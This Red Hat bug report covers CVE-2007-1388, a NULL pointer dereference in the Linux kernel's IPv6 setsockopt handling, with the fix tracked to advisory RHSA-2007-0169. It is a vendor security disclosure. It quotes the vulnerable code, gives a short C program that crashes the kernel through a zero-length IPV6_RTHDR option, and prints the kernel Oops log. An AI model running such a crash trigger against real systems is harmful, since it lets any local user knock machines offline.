Bug 232255 - CVE-2007-1388 NULL pointer dereference in do_ipv6_setsockopt
CVE-2007-1388 NULL pointer dereference in do_ipv6_setsockopt
Status: CLOSED ERRATA
Product: Red Hat Enterprise Linux 5
Classification: Red Hat
Component: kernel (Show other bugs)
5.0
All Linux
medium Severity high
: ---
: ---
Assigned To: Don Howard
Martin Jenner
impact=important,source=vendorsec,rep...
: Security
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2007-03-14 12:00 EDT by Marcel Holtmann
Modified: 2007-11-30 17:07 EST (History)
1 user (show)

See Also:
Fixed In Version: RHSA-2007-0169
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2007-04-30 12:37:48 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Marcel Holtmann 2007-03-14 12:00:56 EDT
There is a NULL pointer dereference in the function do_ipv6_setsockopt in
net/ipv6/ipv6_sockglue.c.
Line 417, opt can be NULL and dereferenced :
		opt = ipv6_renew_options(sk, np->opt, optname,    // opt = NULL
					 (struct ipv6_opt_hdr __user *)optval,
					 optlen);
		if (IS_ERR(opt)) {
			retv = PTR_ERR(opt);
			break;
		}

		/* routing header option needs extra check */
		if (optname == IPV6_RTHDR && opt->srcrt) {        // Oops


Those few lines reproduce the bug :

#include <netinet/in.h>

int main(int argc, char **argv) {
  int s, optval;

  s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
  setsockopt(s, SOL_IPV6, IPV6_RTHDR, &optval, 0);

  return 0;
}


Kernel Oops here :

Mar  8 23:57:17 localhost kernel: BUG: unable to handle kernel NULL pointer
dereference at virtual address 00000010
Mar  8 23:57:17 localhost kernel:  printing eip:
Mar  8 23:57:17 localhost kernel: f8ebb270
Mar  8 23:57:17 localhost kernel: *pde = 00000000
Mar  8 23:57:17 localhost kernel: Oops: 0000 [#1]
Mar  8 23:57:17 localhost kernel: Modules linked in: binfmt_misc rfcomm hidp
l2cap bluetooth fglrx speedstep_centrino cpufreq_userspace cpufreq_stats
freq_table cpufreq_powersave cpufreq_ondemand cpufreq_conservative video
tc1100_wmi sbs sony_acpi pcc_acpi i2c_ec i2c_core hotkey dev_acpi button battery
container ac asus_acpi dm_mod md_mod sr_mod sbp2 scsi_mod ipv6 parport_pc lp
parport 8139cp joydev tsdev usbhid pcmcia tifm_7xx1 tifm_core sdhci mmc_core
8139too mii snd_intel8x0 snd_ac97_codec snd_ac97_bus ipw2200 snd_pcm_oss
snd_mixer_oss yenta_socket rsrc_nonstatic pcmcia_core snd_pcm ieee80211
ieee80211_crypt psmouse serio_raw evdev snd_timer shpchp pci_hotplug intel_agp
agpgart snd soundcore snd_page_alloc rtc ext3 jbd ohci1394 ieee1394 ehci_hcd
uhci_hcd usbcore ide_generic ide_cd cdrom ide_disk piix generic thermal
processor fan capability commoncap vesafb fbcon tileblit font bitblit softcursor
Mar  8 23:57:17 localhost kernel: CPU:    0
Mar  8 23:57:17 localhost kernel: EIP:    0060:[<f8ebb270>]    Tainted: P      VLI
Mar  8 23:57:17 localhost kernel: EFLAGS: 00010246   (2.6.17-11-386 #2) 
Mar  8 23:57:17 localhost kernel: EIP is at ipv6_setsockopt+0xa90/0xc40 [ipv6]
Mar  8 23:57:17 localhost kernel: eax: 00000000   ebx: f0cfca40   ecx: 00000039
  edx: 00000000
Mar  8 23:57:17 localhost kernel: esi: 00000000   edi: 00000000   ebp: 00000039
  esp: f25a9da8
Mar  8 23:57:17 localhost kernel: ds: 007b   es: 007b   ss: 0068
Mar  8 23:57:17 localhost kernel: Process null_deref (pid: 5076,
threadinfo=f25a8000 task=f24a7580)
Mar  8 23:57:17 localhost kernel: Stack: 00000000 00000000 c199ce00 f8c9a4ff
00000001 00000000 f0cfce58 ee42e9c0 
Mar  8 23:57:17 localhost kernel:        c18e1e7c c0179c74 3b9aca00 c199ce00
c18e1de0 ee42e9c0 c18e1e7c 00000000 
Mar  8 23:57:17 localhost kernel:        c199ce00 00000000 ee42e9c0 c18e1e7c
00000000 c013c78b 00001000 c0359330 
Mar  8 23:57:17 localhost kernel: Call Trace:
Mar  8 23:57:17 localhost kernel:  <c0179c74> __mark_inode_dirty+0x34/0x170 
<c013c78b> do_generic_mapping_read+0x42b/0x540
Mar  8 23:57:17 localhost kernel:  <c0154f74> cache_alloc_refill+0x314/0x4d0 
<c01cc98c> vsnprintf+0x55c/0x640
Mar  8 23:57:17 localhost kernel:  <c016f0b7> d_alloc+0x27/0x190  <c016f059>
d_instantiate+0x49/0x80
Mar  8 23:57:17 localhost kernel:  <f8eba7e0> ipv6_setsockopt+0x0/0xc40 [ipv6] 
<c0289966> tcp_setsockopt+0x36/0x370
Mar  8 23:57:17 localhost kernel:  <c0259e83> sock_common_setsockopt+0x23/0x30 
<c02587d5> sys_setsockopt+0x75/0xd0
Mar  8 23:57:17 localhost kernel:  <c0259a19> sys_socketcall+0x209/0x280 
<c02c7a00> do_page_fault+0x0/0x6e0
Mar  8 23:57:17 localhost kernel:  <c0102dbb> sysenter_past_esp+0x54/0x79 
Mar  8 23:57:17 localhost kernel: Code: 00 00 d0 54 2a c0 ff 0d 80 88 ee f8 83
3d 80 87 ee f8 02 0f 85 34 fc ff ff a1 08 89 ee f8 31 ff e8 56 ab 25 c7 e9 d5 f6
ff ff 90 <8b> 50 10 85 d2 0f 84 3e f9 ff ff 80 7a 02 00 90 75 13 0f b6 42 
Mar  8 23:57:17 localhost kernel: EIP: [<f8ebb270>] ipv6_setsockopt+0xa90/0xc40
[ipv6] SS:ESP 0068:f25a9da8
Comment 3 Don Howard 2007-03-29 17:41:56 EDT
A patch for this issue has been included in zstream build 2.6.18-8.1.2.el5.
Comment 5 Mike Gahagan 2007-04-26 18:13:28 EDT
verified on x86_64 system.
Comment 7 Red Hat Bugzilla 2007-04-30 12:37:48 EDT
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2007-0169.html

Note You need to log in before you can comment on or make changes to this bug.